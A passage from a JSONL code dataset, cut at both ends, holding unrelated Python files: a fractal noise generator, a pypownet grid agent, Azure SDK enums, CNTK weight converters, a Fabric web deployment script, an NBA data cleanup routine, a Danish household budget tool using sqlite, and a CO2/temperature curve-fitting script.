3*weighting_fine_grid**2 - 2*weighting_fine_grid**3\n weighting_fine_grid_tiled = np.tile(weighting_fine_grid, (coarse_i_count, coarse_j_count, 1, 1, 1))\n\n # The 2D fine-grid vectors matrix for determining height (by multiplying vs. 
coarse-grid vectors), with submatrix [[upper-left, upper-right], [bottom-left, bottom-right]], and vector subarray [vector-x, vector-y]\n vectors_fine_grid = np.array( \n [[[-fine_grid_gradient_left[:, ::-1], -fine_grid_gradient_up[::-1, :]], # upper-left\n [ fine_grid_gradient_left[:, : ], -fine_grid_gradient_up[::-1, :]]], # upper-right\n [[-fine_grid_gradient_left[:, ::-1], fine_grid_gradient_up[: , :]], # lower-left\n [ fine_grid_gradient_left[:, : ], fine_grid_gradient_up[: , :]]]] # lower-right\n ).transpose(3, 4, 0, 1, 2)\n vectors_fine_grid_tiled = np.tile(vectors_fine_grid, (coarse_i_count, coarse_j_count, 1, 1, 1))\n fine_grid = fine_coarse_grid * vectors_fine_grid_tiled * weighting_fine_grid_tiled\n\n # add multiplied vector-x + multiplied vector-y to get dot product\n fine_grid = fine_grid.transpose(4, 0, 1, 2, 3)\n fine_grid = fine_grid[0] + fine_grid[1]\n\n fine_grid = fine_grid.transpose(2, 3, 0, 1)\n fine_grid = fine_grid[0,0] + fine_grid[1,0] + fine_grid[0,1] + fine_grid[1,1] \n\n return fine_grid[:width, :height] + 0.5\n\n\n# landscape = noise_2d(200,200,100,100)\n# landscape = build_landscape(200, 200, octaves=8)\n# np.savetxt('test.txt', landscape)","sub_path":"fractal_landscape.py","file_name":"fractal_landscape.py","file_ext":"py","file_size_in_byte":4427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"583420006","text":"import pypownet.agent\nimport pypownet.environment\nimport numpy as np\nimport os\n\nclass Submission(pypownet.agent.Agent):\n \"\"\"\n An example of a baseline controler that randomly switches the status of one random power line per timestep (if the\n random line is previously online, switch it off, otherwise switch it on).\n \"\"\"\n\n def __init__(self, environment):\n super().__init__(environment)\n self.verbose = True\n\n def chooseAction(self, template, rewardRef):\n if 0 in template:\n actions = []\n for i in range(len(template)):\n test = template.copy()\n if test[i] != 1:\n test[i] = 1\n actions.append(test)\n rewards = []\n for act in actions:\n act = self.environment.action_space.array_to_action(act)\n rewards.append(sum(self.environment.simulate(act, do_sum = False)))\n rewards = np.asarray(rewards)\n best_index = np.argmax(rewards)\n if rewards[best_index] > rewardRef:\n return actions[best_index]\n return template\n\n def act(self, observation):\n # Sanity check: an observation is a structured object defined in the environment file.\n assert isinstance(observation, pypownet.environment.Observation)\n action_space = self.environment.action_space\n\n # Create template of action with no switch activated (do-nothing action)\n bestAction = np.zeros(action_space.action_length)\n stop = 1\n cpt = 0\n while(True):\n rew = sum(self.environment.simulate(action_space.array_to_action(bestAction), do_sum = False))\n newBestAction = self.chooseAction(bestAction,rew)\n if (np.array_equal(newBestAction,bestAction)):\n break\n bestAction = newBestAction\n cpt = cpt+1\n if cpt == stop:\n break\n reward_aslist = self.environment.simulate(action_space.array_to_action(bestAction), do_sum=False)\n reward = sum(reward_aslist)\n if self.verbose:\n print('reward: [', ', '.join(['%.2f' % c for c in reward_aslist]), '] =', reward)\n return action_space.array_to_action(bestAction)\n","sub_path":"starting_kit/example_submission/submission.py","file_name":"submission.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} 
+{"seq_id":"651479960","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is regenerated.\n# --------------------------------------------------------------------------\n\nfrom enum import Enum\nfrom azure.core import CaseInsensitiveEnumMeta\n\n\nclass AzureBareMetalHardwareTypeNamesEnum(str, Enum, metaclass=CaseInsensitiveEnumMeta):\n \"\"\"Name of the hardware type (vendor and/or their product name).\"\"\"\n\n CISCO_UCS = \"Cisco_UCS\"\n HPE = \"HPE\"\n\n\nclass AzureBareMetalInstancePowerStateEnum(str, Enum, metaclass=CaseInsensitiveEnumMeta):\n \"\"\"Resource power state.\"\"\"\n\n STARTING = \"starting\"\n STARTED = \"started\"\n STOPPING = \"stopping\"\n STOPPED = \"stopped\"\n RESTARTING = \"restarting\"\n UNKNOWN = \"unknown\"\n\n\nclass AzureBareMetalInstanceSizeNamesEnum(str, Enum, metaclass=CaseInsensitiveEnumMeta):\n \"\"\"Specifies the AzureBareMetal instance SKU.\"\"\"\n\n S72_M = \"S72m\"\n S144_M = \"S144m\"\n S72 = \"S72\"\n S144 = \"S144\"\n S192 = \"S192\"\n S192_M = \"S192m\"\n S192_XM = \"S192xm\"\n S96 = \"S96\"\n S112 = \"S112\"\n S224 = \"S224\"\n S224_M = \"S224m\"\n S224_OM = \"S224om\"\n S224_OO = \"S224oo\"\n S224_OOM = \"S224oom\"\n S224_OOO = \"S224ooo\"\n S384 = \"S384\"\n S384_M = \"S384m\"\n S384_XM = \"S384xm\"\n S384_XXM = \"S384xxm\"\n S448 = \"S448\"\n S448_M = \"S448m\"\n S448_OM = \"S448om\"\n S448_OO = \"S448oo\"\n S448_OOM = \"S448oom\"\n S448_OOO = \"S448ooo\"\n S576_M = \"S576m\"\n S576_XM = \"S576xm\"\n S672 = \"S672\"\n S672_M = \"S672m\"\n S672_OM = \"S672om\"\n S672_OO = \"S672oo\"\n S672_OOM = \"S672oom\"\n S672_OOO = \"S672ooo\"\n S768 = \"S768\"\n S768_M = \"S768m\"\n S768_XM = \"S768xm\"\n S896 = \"S896\"\n S896_M = \"S896m\"\n S896_OM = \"S896om\"\n S896_OO = \"S896oo\"\n S896_OOM = \"S896oom\"\n S896_OOO = \"S896ooo\"\n S960_M = \"S960m\"\n\n\nclass AzureBareMetalProvisioningStatesEnum(str, Enum, metaclass=CaseInsensitiveEnumMeta):\n \"\"\"State of provisioning of the AzureBareMetalInstance.\"\"\"\n\n ACCEPTED = \"Accepted\"\n CREATING = \"Creating\"\n UPDATING = \"Updating\"\n FAILED = \"Failed\"\n SUCCEEDED = \"Succeeded\"\n DELETING = \"Deleting\"\n MIGRATING = \"Migrating\"\n\n\nclass CreatedByType(str, Enum, metaclass=CaseInsensitiveEnumMeta):\n \"\"\"The type of identity that created the resource.\"\"\"\n\n USER = \"User\"\n APPLICATION = \"Application\"\n MANAGED_IDENTITY = \"ManagedIdentity\"\n KEY = \"Key\"\n","sub_path":"sdk/baremetalinfrastructure/azure-mgmt-baremetalinfrastructure/azure/mgmt/baremetalinfrastructure/models/_bare_metal_infrastructure_client_enums.py","file_name":"_bare_metal_infrastructure_client_enums.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"295359637","text":"####################################################################################################\n#\n# Project: Embedded Learning Library (ELL)\n# File: cntk_converters.py (importers)\n# Authors: Byron Changuion\n#\n# Requires: Python 3.x, cntk-2.0-cp35\n#\n####################################################################################################\n\n\"\"\"Converts CNTK data structures to ELL 
equivalents\"\"\"\n\nimport ell\nimport numpy as np\n\ndef get_float_vector_from_constant(constant, size):\n # Workaround: For some reason, np.full is not returning a type that SWIG can parse. So just manually walk the array setting the scalar\n array = np.zeros(size, dtype=np.float)\n for i in range(array.size):\n array[i] = constant\n return ell.math.FloatVector(array)\n\n\ndef get_float_vector_from_cntk_trainable_parameter(tensorParameter):\n \"\"\"Returns an ell.math.FloatVector from a trainable parameter\n Note that ELL's ordering is row, column, channel.\n CNTK has them in filter, channel, row, column order.\n \"\"\"\n tensorShape = tensorParameter.shape\n tensorValue = tensorParameter.value\n\n orderedWeights = np.zeros(tensorValue.size, dtype=np.float)\n i = 0\n for columnValue in tensorValue:\n orderedWeights[i] = columnValue\n i += 1\n\n return ell.math.FloatVector(orderedWeights)\n\n\ndef get_float_vector_from_cntk_array(inputArray):\n \"\"\"Returns an ell.math.FloatTensor from a 4, 3, 2, or 1 dimensional numpy array.\n CNTK has input in filter/parallel, channel, row, column order while\n ELL's ordering is row, column, channel.\n \"\"\"\n tensorShape = inputArray.shape\n orderedWeights = np.zeros(inputArray.size, dtype=np.float)\n if (len(tensorShape) == 4):\n i = 0\n for filter in range(tensorShape[0]):\n for row in range(tensorShape[2]):\n for column in range(tensorShape[3]):\n for channel in range(tensorShape[1]):\n orderedWeights[i] = inputArray[filter][channel][row][column]\n i += 1\n # Reshape to (filters * rows, columns, channels)\n orderedWeights = orderedWeights.reshape(\n tensorShape[0] * tensorShape[2], tensorShape[3], tensorShape[1])\n elif (len(tensorShape) == 3):\n i = 0\n for row in range(tensorShape[1]):\n for column in range(tensorShape[2]):\n for channel in range(tensorShape[0]):\n orderedWeights[i] = inputArray[channel][row][column]\n i += 1\n # Reshape to (rows, columns, channels)\n orderedWeights = orderedWeights.reshape(\n tensorShape[1], tensorShape[2], tensorShape[0])\n elif (len(tensorShape) == 2):\n i = 0\n for row in range(tensorShape[1]):\n for column in range(tensorShape[0]):\n orderedWeights[i] = inputArray[column][row]\n i += 1\n # Reshape to (rows, 1, channels)\n orderedWeights = orderedWeights.reshape(\n tensorShape[1], 1, tensorShape[0])\n elif (len(tensorShape) == 1):\n i = 0\n for columnValue in inputArray:\n orderedWeights[i] = columnValue\n i += 1\n # Reshape to (1, 1, channels)\n orderedWeights = orderedWeights.reshape(1, 1, inputArray.size)\n else:\n print(\"Error: Input array has incorrect dimensions\")\n return None\n\n return np.ravel(orderedWeights)\n\n\ndef get_float_tensor_from_cntk_dense_weight_parameter(tensorParameter):\n \"\"\"Returns an ell.math.FloatTensor from a trainable parameter\n Note that ELL's ordering is row, column, channel.\n CNTK has them in channel, row, column, filter order.\n 4D parameters are converted to ELL Tensor by stacking vertically in the row dimension.\n \"\"\"\n tensorShape = tensorParameter.shape\n tensorValue = tensorParameter.value\n\n # orderedWeights = tensorValue\n if (len(tensorShape) == 4):\n orderedWeights = tensorValue\n orderedWeights = np.moveaxis(orderedWeights, 0, -1)\n orderedWeights = np.moveaxis(orderedWeights, 2, 0)\n orderedWeights = orderedWeights.ravel().astype(np.float).reshape(\n tensorShape[3] * tensorShape[1], tensorShape[2], tensorShape[0])\n elif (len(tensorShape) == 3):\n orderedWeights = np.moveaxis(tensorValue, 0, -1)\n orderedWeights = 
orderedWeights.ravel().astype(np.float).reshape(\n tensorShape[1], tensorShape[2], tensorShape[0])\n elif (len(tensorShape) == 2):\n orderedWeights = np.moveaxis(tensorValue, 0, -1)\n orderedWeights = orderedWeights.ravel().astype(\n np.float).reshape(tensorShape[1], 1, tensorShape[0])\n else:\n orderedWeights = tensorValue.ravel().astype(\n np.float).reshape(1, 1, tensorValue.size)\n\n return ell.math.FloatTensor(orderedWeights)\n\n\ndef get_float_tensor_from_cntk_convolutional_weight_parameter(tensorParameter):\n \"\"\"Returns an ell.math.FloatTensor from a trainable parameter\n Note that ELL's ordering is row, column, channel.\n 4D parameters (e.g. those that represent convolutional weights) are stacked vertically in the row dimension.\n CNTK has them in filter, channel, row, column order.\n \"\"\"\n tensorShape = tensorParameter.shape\n tensorValue = tensorParameter.value\n return get_float_tensor_from_cntk_convolutional_weight_value_shape(tensorParameter.value, tensorParameter.shape)\n\n\ndef get_float_tensor_from_cntk_convolutional_weight_value_shape(tensorValue, tensorShape):\n \"\"\"Returns an ell.math.FloatTensor from a trainable parameter\n Note that ELL's ordering is row, column, channel.\n 4D parameters (e.g. those that represent convolutional weights) are stacked vertically in the row dimension.\n CNTK has them in filter, channel, row, column order.\n \"\"\"\n if (len(tensorShape) == 4):\n orderedWeights = np.moveaxis(tensorValue, 1, -1)\n orderedWeights = orderedWeights.ravel().astype(np.float).reshape(\n tensorShape[0] * tensorShape[2], tensorShape[3], tensorShape[1])\n elif (len(tensorShape) == 3):\n orderedWeights = np.moveaxis(tensorValue, 0, -1)\n orderedWeights = orderedWeights.ravel().astype(np.float).reshape(\n tensorShape[1], tensorShape[2], tensorShape[0])\n elif (len(tensorShape) == 2):\n orderedWeights = np.moveaxis(tensorValue, 0, -1)\n orderedWeights = orderedWeights.ravel().astype(\n np.float).reshape(tensorShape[1], tensorShape[0], 1)\n else:\n orderedWeights = tensorValue.ravel().astype(\n np.float).reshape(1, 1, tensorValue.size)\n return ell.math.FloatTensor(orderedWeights)","sub_path":"tools/importers/CNTK/lib/cntk_converters.py","file_name":"cntk_converters.py","file_ext":"py","file_size_in_byte":6690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"249942014","text":"#!/usr/bin/python3\nfrom os import path\nfrom fabric.operations import put, run\nfrom fabric.state import env\n\n\ndef do_deploy(archive_path):\n \"\"\"This function distributes an archive to web servers\"\"\"\n env.hosts = ['35.231.246.19', '34.227.48.93']\n if not path.exists(archive_path):\n return False\n try:\n archive_name = archive_path[9:]\n dest_path = \"/tmp/\" + archive_name\n filename = archive_name[:-4] + \"/\"\n release_path = \"/data/web_static/releases/\"\n frp = release_path + filename\n put(archive_path, dest_path)\n cmd_string = \"mkdir -p \" + frp\n run(cmd_string)\n cmd_string2 = \"tar -xzf \" + dest_path + \" -C \" + frp\n run(cmd_string2)\n cmd_string3 = \"rm \" + dest_path\n run(cmd_string3)\n cmd_string4 = \"mv \" + frp + \"web_static/* \" + frp\n run(cmd_string4)\n cmd_string5 = \"rm -rf \" + frp + \"web_static\"\n run(cmd_string5)\n cmd_string6 = \"rm -rf /data/web_static/current\"\n run(cmd_string6)\n cmd_string7 = \"ln -s \" + frp + \" /data/web_static/current\"\n run(cmd_string7)\n except:\n return False\n return 
True\n","sub_path":"2-do_deploy_web_static.py","file_name":"2-do_deploy_web_static.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"528574411","text":"import pandas as pd\nfrom .db_config import Session\nfrom nba_data.processing.nba_game_starters import GameStarter\n\ndef remove_error_period_starters(game_ids):\n session = Session()\n period_starters_query = session.query(GameStarter).filter(GameStarter.game_id.in_(game_ids))\n period_starters = pd.read_sql_query(period_starters_query.statement, session.bind)\n starters_error_ids = []\n for group, df in period_starters.groupby(['sport','season','game_id','period',\n 'team_id']):\n starters_error_ids.append(df.sort_values(by=['min'], ascending=False)[5:])\n if starters_error_ids:\n starters_error_ids = list(pd.concat(starters_error_ids, axis=0)['id'].values)\n else:\n starters_error_ids = []\n for error_id in starters_error_ids:\n delete_records = session.query(GameStarter).filter(GameStarter.id==str(error_id))\n delete_records.delete(synchronize_session=False)\n session.commit()\n session.close()\n return True\n","sub_path":"nba_data/processing/process_error_period_starters.py","file_name":"process_error_period_starters.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"598149167","text":"import numpy as np\nimport sqlite3\nimport time\n\ndef new(folder, name):\n conn = sqlite3.connect('{}/{}.db'.format(folder,name))\n\n c = conn.cursor()\n\n #Definer din sql kommando\n command = \"\"\"CREATE TABLE budget\n (amount FLOAT, allocate FLOAT, account INTEGER, category TEXT, day INTEGER, month INTEGER, year INTEGER, memo TEXT);\n \"\"\"\n c.execute(command)\n #HUSK at commit'e! 
\n    conn.commit()\n\n    #Når du er færdig kan du lukke forbindelsen\n    conn.close()\n\ndef income(amount,account,date=0,memo=0,folder='data',name='budget'):\n    conn = sqlite3.connect('{}/{}.db'.format(folder,name))\n    c = conn.cursor()\n    transaction = (amount, account.title())\n\n    if date == 0:\n        transaction = transaction + (int(time.strftime(\"%d\")), int(time.strftime(\"%m\")),int(time.strftime(\"%Y\")),)\n    else:\n        dato = date.split('/')\n        transaction = transaction + (int(dato[0]),int(dato[1]),int(dato[2]),)\n\n    if memo != 0:\n        transaction = transaction + (memo,)\n        c.execute('INSERT INTO budget (amount, account, day, month, year, memo) VALUES (?,?,?,?,?,?)',transaction)\n    else:\n        c.execute('INSERT INTO budget (amount, account, day, month, year) VALUES (?,?,?,?,?)',transaction)\n\n    conn.commit()\n    conn.close()\n\ndef newtransaction(category,amount,account,accountto=0,date=0,memo=0,folder='data',name='budget'):\n    conn = sqlite3.connect('{}/{}.db'.format(folder,name))\n    c = conn.cursor()\n\n    transaction = (-amount,account.title(), category.title())\n\n    if date == 0:\n        transaction = transaction + (int(time.strftime(\"%d\")), int(time.strftime(\"%m\")),int(time.strftime(\"%Y\")),)\n    else:\n        dato = date.split('/')\n        transaction = transaction + (int(dato[0]),int(dato[1]),int(dato[2]),)\n\n    if memo != 0:\n        transaction = transaction + (memo,)\n        c.execute('INSERT INTO budget (amount, account, category, day, month, year, memo) VALUES (?,?,?,?,?,?,?)',transaction)\n    else:\n        c.execute('INSERT INTO budget (amount, account, category, day, month, year) VALUES (?,?,?,?,?,?)',transaction)\n    conn.commit()\n    conn.close()\n\ndef allocate(category,amount,date=0,folder='data',name='budget'):\n    allocation = (category.title(), amount)\n    if date == 0:\n        day = int(time.strftime(\"%d\"))\n        month = int(time.strftime(\"%m\"))\n        year = int(time.strftime(\"%Y\"))\n\n    else:\n        dato = date.split('/')\n        day = int(dato[0])\n        month = int(dato[1])\n        year = int(dato[2])\n    allocation = allocation + (day,month,year,)\n    conn = sqlite3.connect('{}/{}.db'.format(folder,name))\n    c = conn.cursor()\n    c.execute('INSERT INTO budget (category,allocate, day, month, year) VALUES (?,?,?,?,?)',allocation)\n    conn.commit()\n    conn.close()\n\ndef accountinfo(folder='data',name='budget',month=0):\n    conn = sqlite3.connect('{}/{}.db'.format(folder,name))\n    c = conn.cursor()\n    overview = []\n    if month == 0:\n        month = int(time.strftime(\"%m\"))\n    for row in c.execute('SELECT SUM(amount), account FROM budget WHERE account IS NOT NULL GROUP BY account;'):\n        overview.append(row)\n    just=15\n    print(\"Kontooverblik\")\n    print(\"\".ljust(just*4,'-'))\n    for element in overview:\n        print(\"{}:\".format(element[1]).ljust(just)+\"{}\".format(element[0]).ljust(just))\n    conn.commit()\n    conn.close()\n\ndef update(wrong_columns,wrong_input,new_input,folder='data',name='budget'):\n    conn = sqlite3.connect('{}/{}.db'.format(folder,name))\n    c = conn.cursor()\n    if wrong_columns.lower()=='category':\n        c.execute(\"\"\"UPDATE budget SET category = ? WHERE category=?;\"\"\",(new_input.title(),wrong_input.title()))\n    elif wrong_columns.lower()=='account':\n        c.execute(\"\"\"UPDATE budget SET account = ? 
WHERE account=?;\"\"\",(new_input.title(),wrong_input.title()))\n    conn.commit()\n    conn.close()\n\ndef showtransactions(folder='data',name='budget',month=0):\n    conn = sqlite3.connect('{}/{}.db'.format(folder,name))\n    c = conn.cursor()\n    overview = []\n    if month == 0:\n        month = int(time.strftime(\"%m\"))\n    for row in c.execute('SELECT amount, category, memo, account FROM budget WHERE month=? AND allocate IS NULL;',(month,)):\n        overview.append(row)\n    month_translate = {1:'januar',2:'februar',3:'marts',4:'april',5:'maj',6:'juni',7:'juli',8:'august',9:'september',10:'oktober',11:'november',12:'december'}\n    dist = 20\n    print(\"Følgende transaktioner er foretaget i {} måned\".format(month_translate[month]))\n    print(\"\")\n    print(\"Konto\".ljust(dist)+\"Beløb\".ljust(dist)+\"Kategori\".ljust(dist)+\"Memo\".ljust(dist))\n    print(\"\".ljust(4*dist,'-'))\n    for i in range(0,len(overview)):\n        if overview[i][1]==None:\n            lst = list(overview[i])\n            lst[1]=\"Indkomst\"\n            overview[i]=tuple(lst)\n    for element in overview:\n        if element[2]==None:\n            print(\"{}\".format(element[3]).ljust(dist)+\"{}\".format(element[0]).ljust(dist)+\"{}\".format(element[1]).ljust(dist))\n        else:\n            print(\"{}\".format(element[3]).ljust(dist)+\"{}\".format(element[0]).ljust(dist)+\"{}\".format(element[1]).ljust(dist)+\"{}\".format(element[2]))\n    conn.commit()\n    conn.close()\n\ndef showbudget(folder='data',name='budget',month=0):\n    month_translate = {1:'januar',2:'februar',3:'marts',4:'april',5:'maj',6:'juni',7:'juli',8:'august',9:'september',10:'oktober',11:'november',12:'december'}\n    conn = sqlite3.connect('{}/{}.db'.format(folder,name))\n    c = conn.cursor()\n    budget_month = []\n    budget_tot = []\n    if month == 0:\n        month=int(time.strftime(\"%m\"))\n\n    #Okay, first I'll look what's been budgeted and spend this month\n    for row in c.execute('SELECT SUM(amount), SUM(allocate), category FROM budget WHERE month=? 
AND category IS NOT NULL GROUP BY category;',(month,)):\n budget_month.append(row)\n\n #And compare total income to total amount budgeted\n to_be_budgeted = []\n for row in c.execute(\"\"\"SELECT SUM(amount) FROM budget WHERE amount>0;\"\"\"):\n to_be_budgeted.append(row)\n for row in c.execute(\"\"\"SELECT SUM(allocate) FROM budget;\"\"\"):\n to_be_budgeted.append(row)\n\n #Which I'll need to substract any non liqued assets\n aktier = []\n for row in c.execute(\"\"\"SELECT SUM(amount) FROM budget WHERE account='Aktier';\"\"\"):\n aktier.append(row)\n if aktier[0][0]==None:\n aktier=[[0]]\n\n for row in c.execute('SELECT SUM(amount), SUM(allocate), category FROM budget WHERE category IS NOT NULL GROUP BY category;'):\n budget_tot.append(row)\n\n print_var = []\n for element in budget_tot:\n for thing in budget_month:\n if thing[2]==element[2]:\n print_var.append(element + (thing[0],thing[1],))\n\n just = 20\n faste = ['Husleje','Fællesindkøb']\n variable =['Telefon','Forsikring','Medicin','Tøj', 'Gaver', 'Elektronik','Streaming','Uforudsete Faste','Studie','Transport']\n fun = ['Byen','Fælles Hygge', 'Musik Og Film','Sjov']\n future = ['Overskud Til Hygge','Lejlighed', 'Sydafrika', 'Emergency']\n\n print(\"\")\n print(\"Budget for {} måned\".format(month_translate[month]))\n print(\"To be Budgeted: {0:.2f}\".format(to_be_budgeted[0][0]-to_be_budgeted[1][0]-aktier[0][0]))\n print(\"\".ljust(4*just,'-'))\n print(\"Kategori\".ljust(just)+\"Budgetteret\".ljust(just)+\"Forbrug\".ljust(just)+\"Tilgængeligt\".ljust(just))\n print(\"\".ljust(4*just,'-'))\n for i in range(0,len(print_var)):\n for j in range(0,len(print_var[i])):\n if print_var[i][j] == None:\n lst = list(print_var[i])\n lst[j]=0\n print_var[i]=tuple(lst)\n print(\"\")\n print(\"Faste Udgifter\")\n print(\"\".ljust(just*4,'-'))\n antal = 0\n for i in range(0,len(print_var)):\n if len(print_var[i])==5 and print_var[i][2] in faste:\n antal = antal+1\n faste.remove(print_var[i][2])\n print(\"{}\".format(print_var[i][2]).ljust(just)+\"{0:.2f}\".format(print_var[i][4]).ljust(just)+\"{0:.2f}\".format(abs(print_var[i][3])).ljust(just)+\"{0:.2f}\".format(print_var[i][1]+print_var[i][0]).ljust(just))\n for i in range(0,len(faste)):\n print(\"{}\".format(faste[i]).ljust(just))\n print(\"\")\n print(\"Variable\")\n print(\"\".ljust(just*4,'-'))\n for i in range(0,len(print_var)):\n if len(print_var[i])==5 and print_var[i][2] in variable:\n variable.remove(print_var[i][2])\n antal = antal+1\n print(\"{}\".format(print_var[i][2]).ljust(just)+\"{0:.2f}\".format(print_var[i][4]).ljust(just)+\"{0:.2f}\".format(abs(print_var[i][3])).ljust(just)+\"{0:.2f}\".format(print_var[i][1]+print_var[i][0]).ljust(just))\n for i in range(0,len(variable)):\n print(\"{}\".format(variable[i]).ljust(just))\n print(\"\")\n print(\"Sjov og Hygge\")\n print(\"\".ljust(just*4,'-'))\n for i in range(0,len(print_var)):\n if len(print_var[i])==5 and print_var[i][2] in fun:\n fun.remove(print_var[i][2])\n antal = antal+1\n print(\"{}\".format(print_var[i][2]).ljust(just)+\"{0:.2f}\".format(print_var[i][4]).ljust(just)+\"{0:.2f}\".format(abs(print_var[i][3])).ljust(just)+\"{0:.2f}\".format(print_var[i][1]+print_var[i][0]).ljust(just))\n for i in range(0,len(fun)):\n print(\"{}\".format(fun[i]).ljust(just))\n print(\"\")\n print(\"Fremtid\")\n print(\"\".ljust(just*4,'-'))\n for i in range(0,len(print_var)):\n if len(print_var[i])==5 and print_var[i][2] in future:\n future.remove(print_var[i][2])\n antal = antal+1\n 
print(\"{}\".format(print_var[i][2]).ljust(just)+\"{0:.2f}\".format(print_var[i][4]).ljust(just)+\"{0:.2f}\".format(abs(print_var[i][3])).ljust(just)+\"{0:.2f}\".format(print_var[i][1]+print_var[i][0]).ljust(just))\n for i in range(0,len(future)):\n print(\"{}\".format(future[i]).ljust(just))\n if (antal-len(print_var))!=0:\n print(\"\")\n print(\"Uden for Kategori\")\n print(\"\".ljust(just*4,'-'))\n for i in range(0,len(print_var)):\n if len(print_var[i])==5 and not (print_var[i][2] in faste or print_var[i][2] in variable or print_var[i][2] in fun or print_var[i][2] in future):\n print(\"{}\".format(print_var[i][2]).ljust(just)+\"{0:.2f}\".format(print_var[i][4]).ljust(just)+\"{0:.2f}\".format(abs(print_var[i][3])).ljust(just)+\"{0:.2f}\".format(print_var[i][1]+print_var[i][0]).ljust(just))\n conn.commit()\n conn.close()\n\nmappe = 'data'\ndatabase = 'budget'\n","sub_path":"budget.py","file_name":"budget.py","file_ext":"py","file_size_in_byte":10413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"647308861","text":"import temperature_CO2_plotter as plotter\nimport numpy as np\nimport scipy.optimize as opt\nimport matplotlib.pyplot as plt\n\n\ndef CO2_extrapolate(x, a, b, d, e, g) :\n\t\"\"\"\n\tFunction used to extrapolate the CO2 levels (as a function of time).\n\n\t\t@param \tx \t\t\tyears\n\t\t@param \ta,...,g \tparameters used for curve fitting\n\t\t@return \t\t\tpolynomial plus exponential value\n\t\"\"\"\n\treturn a + b*x + d*np.exp(e*(x-g))\n\n\ndef T_extrapolate(x, a, b, c) :\n\t\"\"\"\n\tFunction used to extrapolate the T (as a function of the CO2 levels).\n\n\t\t@param \tx \t\t\tCO2 levels\n\t\t@param \ta,...,c \tparameters used for curve fitting\n\t\t@return \t\t\tpolynomial value\n\t\"\"\"\n\treturn a + b*x + c*x**2\n\n\ndef extrapolateCO2(month='January', yearsInFuture=20, plotting=False) :\n\t\"\"\"\n\tExtrapolate the CO2 levels (as function of time), the temperature (as \n\tfunction of CO2 levels), and the temperature as a function of time (based on\n\tthe aforementioned CO2 levels [as a function of time]).\n\n\tA second order polynomial and an exponential is used to fit the CO2 levels,\n\twhile a second order polynomial alone is used to fit the temperature.\n\n\t\t@param \tmonth \t\tthe month for which we are extrapolating temperature \n\t\t\t\t\t\t\tinto the future\n\t\t@param \tplotting \tif true, the CO2(time), the T(CO2), and the T(time)\n\t\t\t\t\t\t\tplots are shown.\n\t\t@return \t\t\tan array of years, along with an array of predicted \n\t\t\t\t\t\t\tCO2 levels and the actual CO2 levels observed, and\n\t\t\t\t\t\t\talso the predicted T and the actual T observed\n\t\"\"\"\n\tmonth \t\t\t= month.capitalize()\n\tyearCO2, CO2 \t= plotter.findCO2()\n\tyearT, T \t\t= plotter.findTemperature(month)\n\tyf \t\t\t\t= yearsInFuture\n\n\t# Ensure year and CO2 are _true_ 1D numpy arrays (N,) dim, not (N,1) dim.\n\tyearCO2 = np.ravel(yearCO2)\n\tyearT \t= np.ravel(yearT)\n\tCO2 \t= np.ravel(CO2)\n\tT \t\t= np.ravel(T)\n\tCO2T \t= CO2[65:]\n\n\t# Let scipy find the optimal parameters for the CO2(year) interpolation.\n\toptimalParamsCO2, cov = opt.curve_fit(CO2_extrapolate, yearCO2, CO2, \\\n\t\t\t\t\t\t\t\t\t bounds=([-100.,0.,0.,0.,0.],\\\n\t\t\t\t\t\t\t\t\t \t\t [100.,10.,3e-2,3e-2,2e3]))\n\toptimalParamsTaverage = np.asarray([0.,0.,0.])\n\n\t# Lets find the optimal third degree polynomial to fit T as a function of \n\t# CO2 for every month of the year (excluding the constant part).\n\tfor tmpmonth in [\t'January'\t, 
\t\\\n\t\t\t\t\t\t'February'\t, \t\\\n\t\t\t\t\t\t'March'\t\t, \t\\\n\t\t\t\t\t\t'April'\t\t, \t\\\n\t\t\t\t\t\t'May'\t\t, \t\\\n\t\t\t\t\t\t'June'\t\t, \t\\\n\t\t\t\t\t\t'July'\t\t, \t\\\n\t\t\t\t\t\t'August'\t, \t\\\n\t\t\t\t\t\t'September'\t, \t\\\n\t\t\t\t\t\t'October'\t, \t\\\n\t\t\t\t\t\t'November'\t, \t\\\n\t\t\t\t\t\t'December'\t\t\t] :\n\t\n\t\ttmpYear, tmpT \t= plotter.findTemperature(tmpmonth)\n\t\ttmpT \t\t\t= np.ravel(tmpT)\n\n\t\t# Let scipy find the optimal parameters for the T(CO2) interpolation.\n\t\ttmpoptimalParamsT, cov = opt.curve_fit(T_extrapolate, CO2T, tmpT, \\\n\t\t\t\t\t\t\t\t\t\t\t \tbounds=([-10.,0.,-10.], \\\n\t\t\t\t\t\t\t\t\t\t\t \t\t\t[30.,10.,10.]))\n\t\toptimalParamsTaverage[1:] += tmpoptimalParamsT[1:]\n\t\tif tmpmonth == month :\n\t\t\toptimalParamsTaverage[0] = 12. * tmpoptimalParamsT[0]\n\t\n\t# Take the actual best fit to be the average of all the months parameters.\n\t# The constant term is taken only for the month in question.\n\toptimalParamsT = optimalParamsTaverage / 12.\n\tyearPlusCO2 = np.linspace(min(yearCO2), max(yearCO2)+yf,len(yearCO2)*100)\n\tyearPlusT \t= np.linspace(min(yearT), max(yearT)+yf, len(yearT)*100)\n\n\tif plotting :\n\t\t# Visualize CO2 as a function of time, and the extrapolation.\n\t\tfig = plt.figure(100)\n\t\tplt.plot(yearCO2, CO2)\n\t\tplt.hold('on')\n\t\tplt.plot(yearPlusCO2, CO2_extrapolate(yearPlusCO2, *optimalParamsCO2))\n\n\t\t# Visualize T as a function of CO2.\n\t\tfig = 